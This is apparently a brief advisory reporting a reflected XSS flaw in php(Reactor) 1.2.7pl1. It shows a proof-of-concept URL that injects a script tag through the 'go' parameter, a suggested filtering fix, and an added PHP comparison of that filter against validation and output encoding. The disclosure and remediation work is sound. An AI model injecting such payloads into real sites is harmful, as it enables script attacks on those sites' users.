XSS bug in php(Reactor)

Vulnerable systems:
1.2.7pl1

Exploit:
forums/browse.php?fid=3&tid=46&go=<scri*pt>JavaScript:alert
('Hi');</scri*pt>

(without "*")

Solution:
I thought of this, but I am not sure.

Open browse.php and add this code at line 52:

$go = HTMLSpecialChars($go);
$go = PREG_Replace("/[A-Z&.;:()~!@#$%^''*\{\}\/]/i", "", $go);

----------------------------------
Arab Vieruz

thanx
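
Added example (not part of the original post and not php(Reactor) code): the posted filter run beside a validate-then-encode alternative on constructed inputs. That `go` is meant to be a non-negative integer is an assumption, and `validate_go` and `h` are hypothetical helper names.

```php
<?php
// Added example; not php(Reactor) code. Sample inputs are constructed.

// The filter exactly as posted in the message above.
function posted_filter(string $go): string
{
    $go = htmlspecialchars($go);
    return preg_replace("/[A-Z&.;:()~!@#$%^''*\{\}\/]/i", "", $go);
}

// Assumption: go is meant to be a non-negative integer, like fid and tid.
// Reject anything else rather than rewriting it into something "safe".
// Hypothetical helper name.
function validate_go($raw): ?int
{
    // A query string such as go[]=1 gives PHP an array, not a string.
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 9) {
        return null;
    }
    return (int) $raw;
}

// Encode at the point of output, for HTML text and quoted attribute values.
// Hypothetical helper name.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$samples = ['3', 'next', '<b>x</b>', "a\"b'c", ['1']];

foreach ($samples as $raw) {
    $shown = is_array($raw) ? 'array' : $raw;
    $posted = is_string($raw) ? posted_filter($raw) : '(not a string)';
    $valid = validate_go($raw);
    printf(
        "input=%s | posted filter=%s | validated=%s | encoded for output=%s\n",
        var_export($shown, true),
        var_export($posted, true),
        var_export($valid, true),
        var_export(is_string($raw) ? h($raw) : null, true)
    );
}
```

Because the posted pattern combines `A-Z` with the `/i` flag, it removes every letter, so any alphabetic value of `go` is altered rather than rejected.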


